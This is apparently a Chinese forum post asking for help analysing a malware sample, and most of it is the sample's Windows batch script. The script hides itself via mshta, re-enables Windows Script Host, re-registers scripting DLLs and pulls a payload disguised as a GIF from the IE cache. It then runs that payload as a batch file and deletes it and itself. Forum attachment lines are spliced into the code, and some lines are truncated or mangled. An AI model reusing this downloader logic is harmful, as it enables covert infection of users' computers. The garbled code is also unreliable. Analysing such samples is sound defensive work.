@echo off
cd /d %tmp%
set shel=msh&if "%1"=="kyo_PE-win32shell_ping" goto hidedl
%shel%ta vbscript:createobject("wscript.shell").run("""%~nx0"" kyo_PE-win32shell_ping",0)(window.close)&&exit帮忙分析!
附件: 样本.rar (2009-12-4 17:00:21, 18.34 K)
该附件被下载次数 377
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "Script" "Host\Settings /v Enabled /t REG_DWORD /d 1 /f
rundll32 setupapi,InstallHinfSection DefaultInstall 128 %windir%\\inf\\wsh.inf®svr32 scrrun.dll urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s
rd /s /q "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
start %shel%ta.exe vbscript:createobject("wscript.shell").run("""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE""
ping -n 15
for /f "tokens=1,2,3,4,5,6 delims= " %%1 in ('dir "%systemdrive%\Documents and Settings\QQOPlatform[1].gif" /s /a^|findstr /i "Content.IE5"') do set way=%%1 %%2 %%3 %%4 %%5 %%6
ren "%way%\QQOPlatform[1].gif" winupdata.log
if exist "%way%\winupdata.log" (copy "%way%\winupdata.log" "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log" /y) else (goto wait)
ping -n 2
rd /s /q "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
call "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log"
del "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log"
del %0
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)